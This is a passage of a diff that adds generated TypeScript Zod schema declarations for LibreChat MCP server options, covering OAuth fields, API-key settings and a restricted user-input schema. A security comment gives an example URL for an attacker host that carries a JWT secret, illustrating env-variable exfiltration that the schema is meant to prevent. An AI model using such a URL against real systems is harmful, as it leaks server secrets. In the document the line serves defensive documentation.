+ /** OAuth token endpoint (optional - can be auto-discovered) */
2523
+ token_url: z.ZodOptional<z.ZodString>;
2524
+ /** OAuth client ID (optional - can use dynamic registration) */
2525
+ client_id: z.ZodOptional<z.ZodString>;
2526
+ /** OAuth client secret (optional - can use dynamic registration) */
2527
+ client_secret: z.ZodOptional<z.ZodString>;
2528
+ /** OAuth scopes to request */
2529
+ scope: z.ZodOptional<z.ZodString>;
2530
+ /** OAuth redirect URI (defaults to /api/mcp/{serverName}/oauth/callback) */
2531
+ redirect_uri: z.ZodOptional<z.ZodString>;
2532
+ /** Token exchange method */
2533
+ token_exchange_method: z.ZodOptional<z.ZodNativeEnum<typeof TokenExchangeMethodEnum>>;
2534
+ /** Supported grant types (defaults to ['authorization_code', 'refresh_token']) */
2535
+ grant_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2536
+ /** Supported token endpoint authentication methods (defaults to ['client_secret_basic', 'client_secret_post']) */
2537
+ token_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2538
+ /** Supported response types (defaults to ['code']) */
2539
+ response_types_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2540
+ /** Supported code challenge methods (defaults to ['S256', 'plain']) */
2541
+ code_challenge_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2542
+ /** Skip code challenge validation and force S256 (useful for providers like AWS Cognito that support S256 but don't advertise it) */
2543
+ skip_code_challenge_check: z.ZodOptional<z.ZodBoolean>;
2544
+ /** OAuth revocation endpoint (optional - can be auto-discovered) */
2545
+ revocation_endpoint: z.ZodOptional<z.ZodString>;
2546
+ /** OAuth revocation endpoint authentication methods supported (optional - can be auto-discovered) */
2547
+ revocation_endpoint_auth_methods_supported: z.ZodOptional<z.ZodArray<z.ZodString, "many">>;
2548
+ }, "strip", z.ZodTypeAny, {
2549
+ authorization_url?: string | undefined;
2550
+ token_url?: string | undefined;
2551
+ client_id?: string | undefined;
2552
+ client_secret?: string | undefined;
2553
+ scope?: string | undefined;
2554
+ redirect_uri?: string | undefined;
2555
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2556
+ grant_types_supported?: string[] | undefined;
2557
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2558
+ response_types_supported?: string[] | undefined;
2559
+ code_challenge_methods_supported?: string[] | undefined;
2560
+ skip_code_challenge_check?: boolean | undefined;
2561
+ revocation_endpoint?: string | undefined;
2562
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2563
+ }, {
2564
+ authorization_url?: string | undefined;
2565
+ token_url?: string | undefined;
2566
+ client_id?: string | undefined;
2567
+ client_secret?: string | undefined;
2568
+ scope?: string | undefined;
2569
+ redirect_uri?: string | undefined;
2570
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2571
+ grant_types_supported?: string[] | undefined;
2572
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2573
+ response_types_supported?: string[] | undefined;
2574
+ code_challenge_methods_supported?: string[] | undefined;
2575
+ skip_code_challenge_check?: boolean | undefined;
2576
+ revocation_endpoint?: string | undefined;
2577
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2578
+ }>>;
2579
+ /** Custom headers to send with OAuth requests (registration, discovery, token exchange, etc.) */
2580
+ oauth_headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
2581
+ /**
2582
+ * API Key authentication configuration for SSE and Streamable HTTP transports
2583
+ * - source: 'admin' means the key is provided by admin and shared by all users
2584
+ * - source: 'user' means each user provides their own key via customUserVars
2585
+ */
2586
+ apiKey: z.ZodOptional<z.ZodObject<{
2587
+ /** API key value (only for admin-provided mode, stored encrypted) */
2588
+ key: z.ZodOptional<z.ZodString>;
2589
+ /** Whether key is provided by admin or each user */
2590
+ source: z.ZodEnum<["admin", "user"]>;
2591
+ /** How to format the authorization header */
2592
+ authorization_type: z.ZodEnum<["basic", "bearer", "custom"]>;
2593
+ /** Custom header name when authorization_type is 'custom' */
2594
+ custom_header: z.ZodOptional<z.ZodString>;
2595
+ }, "strip", z.ZodTypeAny, {
2596
+ source: "admin" | "user";
2597
+ authorization_type: "custom" | "basic" | "bearer";
2598
+ key?: string | undefined;
2599
+ custom_header?: string | undefined;
2600
+ }, {
2601
+ source: "admin" | "user";
2602
+ authorization_type: "custom" | "basic" | "bearer";
2603
+ key?: string | undefined;
2604
+ custom_header?: string | undefined;
2605
+ }>>;
2606
+ customUserVars: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodObject<{
2607
+ title: z.ZodString;
2608
+ description: z.ZodString;
2609
+ }, "strip", z.ZodTypeAny, {
2610
+ title: string;
2611
+ description: string;
2612
+ }, {
2613
+ title: string;
2614
+ description: string;
2615
+ }>>>;
2616
+ } & {
2617
+ type: z.ZodUnion<[z.ZodLiteral<"streamable-http">, z.ZodLiteral<"http">]>;
2618
+ headers: z.ZodOptional<z.ZodRecord<z.ZodString, z.ZodString>>;
2619
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
2620
+ }, "strip", z.ZodTypeAny, {
2621
+ type: "streamable-http" | "http";
2622
+ url: string;
2623
+ title?: string | undefined;
2624
+ description?: string | undefined;
2625
+ startup?: boolean | undefined;
2626
+ iconPath?: string | undefined;
2627
+ timeout?: number | undefined;
2628
+ sseReadTimeout?: number | undefined;
2629
+ initTimeout?: number | undefined;
2630
+ chatMenu?: boolean | undefined;
2631
+ serverInstructions?: string | boolean | undefined;
2632
+ requiresOAuth?: boolean | undefined;
2633
+ oauth?: {
2634
+ authorization_url?: string | undefined;
2635
+ token_url?: string | undefined;
2636
+ client_id?: string | undefined;
2637
+ client_secret?: string | undefined;
2638
+ scope?: string | undefined;
2639
+ redirect_uri?: string | undefined;
2640
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2641
+ grant_types_supported?: string[] | undefined;
2642
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2643
+ response_types_supported?: string[] | undefined;
2644
+ code_challenge_methods_supported?: string[] | undefined;
2645
+ skip_code_challenge_check?: boolean | undefined;
2646
+ revocation_endpoint?: string | undefined;
2647
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2648
+ } | undefined;
2649
+ oauth_headers?: Record<string, string> | undefined;
2650
+ apiKey?: {
2651
+ source: "admin" | "user";
2652
+ authorization_type: "custom" | "basic" | "bearer";
2653
+ key?: string | undefined;
2654
+ custom_header?: string | undefined;
2655
+ } | undefined;
2656
+ customUserVars?: Record<string, {
2657
+ title: string;
2658
+ description: string;
2659
+ }> | undefined;
2660
+ headers?: Record<string, string> | undefined;
2661
+ }, {
2662
+ type: "streamable-http" | "http";
2663
+ url: string;
2664
+ title?: string | undefined;
2665
+ description?: string | undefined;
2666
+ startup?: boolean | undefined;
2667
+ iconPath?: string | undefined;
2668
+ timeout?: number | undefined;
2669
+ sseReadTimeout?: number | undefined;
2670
+ initTimeout?: number | undefined;
2671
+ chatMenu?: boolean | undefined;
2672
+ serverInstructions?: string | boolean | undefined;
2673
+ requiresOAuth?: boolean | undefined;
2674
+ oauth?: {
2675
+ authorization_url?: string | undefined;
2676
+ token_url?: string | undefined;
2677
+ client_id?: string | undefined;
2678
+ client_secret?: string | undefined;
2679
+ scope?: string | undefined;
2680
+ redirect_uri?: string | undefined;
2681
+ token_exchange_method?: TokenExchangeMethodEnum | undefined;
2682
+ grant_types_supported?: string[] | undefined;
2683
+ token_endpoint_auth_methods_supported?: string[] | undefined;
2684
+ response_types_supported?: string[] | undefined;
2685
+ code_challenge_methods_supported?: string[] | undefined;
2686
+ skip_code_challenge_check?: boolean | undefined;
2687
+ revocation_endpoint?: string | undefined;
2688
+ revocation_endpoint_auth_methods_supported?: string[] | undefined;
2689
+ } | undefined;
2690
+ oauth_headers?: Record<string, string> | undefined;
2691
+ apiKey?: {
2692
+ source: "admin" | "user";
2693
+ authorization_type: "custom" | "basic" | "bearer";
2694
+ key?: string | undefined;
2695
+ custom_header?: string | undefined;
2696
+ } | undefined;
2697
+ customUserVars?: Record<string, {
2698
+ title: string;
2699
+ description: string;
2700
+ }> | undefined;
2701
+ headers?: Record<string, string> | undefined;
2702
+ }>]>>;
2703
+ export type MCPOptions = z.infer<typeof MCPOptionsSchema>;
2704
+ /**
2705
+ * MCP Server configuration that comes from UI/API input only.
2706
+ * Omits server-managed fields like startup, timeout, customUserVars, etc.
2707
+ * Allows: title, description, url, iconPath, oauth (user credentials)
2708
+ *
2709
+ * SECURITY: Stdio transport is intentionally excluded from user input.
2710
+ * Stdio allows arbitrary command execution and should only be configured
2711
+ * by administrators via the YAML config file (librechat.yaml).
2712
+ * Only remote transports (SSE, HTTP, WebSocket) are allowed via the API.
2713
+ *
2714
+ * SECURITY: URL fields use userUrlSchema instead of the admin schemas'
2715
+ * extractEnvVariable transform to prevent env variable exfiltration
2716
+ * through user-controlled URLs (e.g. http://attacker.com/?k=${JWT_SECRET}).
2717
+ * Protocol checks use positive allowlists (http(s) / ws(s)) to block
2718
+ * file://, ftp://, javascript:, and other non-network schemes.
2719
+ */
2720
+ export declare const MCPServerUserInputSchema: z.ZodUnion<[z.ZodObject<{
2721
+ [x: string]: z.ZodTypeAny;
2722
+ [x: number]: z.ZodTypeAny;
2723
+ } & {
2724
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
2725
+ }, z.UnknownKeysParam, z.ZodTypeAny, {
2726
+ [x: string]: any;
2727
+ [x: number]: any;
2728
+ url?: unknown;
2729
+ }, {
2730
+ [x: string]: any;
2731
+ [x: number]: any;
2732
+ url?: unknown;
2733
+ }>, z.ZodObject<{
2734
+ [x: string]: z.ZodTypeAny;
2735
+ [x: number]: z.ZodTypeAny;
2736
+ } & {
2737
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
2738
+ }, z.UnknownKeysParam, z.ZodTypeAny, {
2739
+ [x: string]: any;
2740
+ [x: number]: any;
2741
+ url?: unknown;
2742
+ }, {
2743
+ [x: string]: any;
2744
+ [x: number]: any;
2745
+ url?: unknown;
2746
+ }>, z.ZodObject<{
2747
+ [x: string]: z.ZodTypeAny;
2748
+ [x: number]: z.ZodTypeAny;
2749
+ } & {
2750
+ url: z.ZodEffects<z.ZodPipeline<z.ZodEffects<z.ZodString, string, string>, z.ZodString>, string, string>;
2751
+ }, z.UnknownKeysParam, z.ZodTypeAny, {
2752
+ [x: string]: any;
2753
+ [x: number]: any;
2754
+ url?: unknown;
2755
+ }, {
2756
+ [x: string]: any;
2757
+ [x: number]: any;
2758
+ url?: unknown;
2759
+ }>]>;
2760
+ export type MCPServerUserInput = z.infer<typeof MCPServerUserInputSchema>;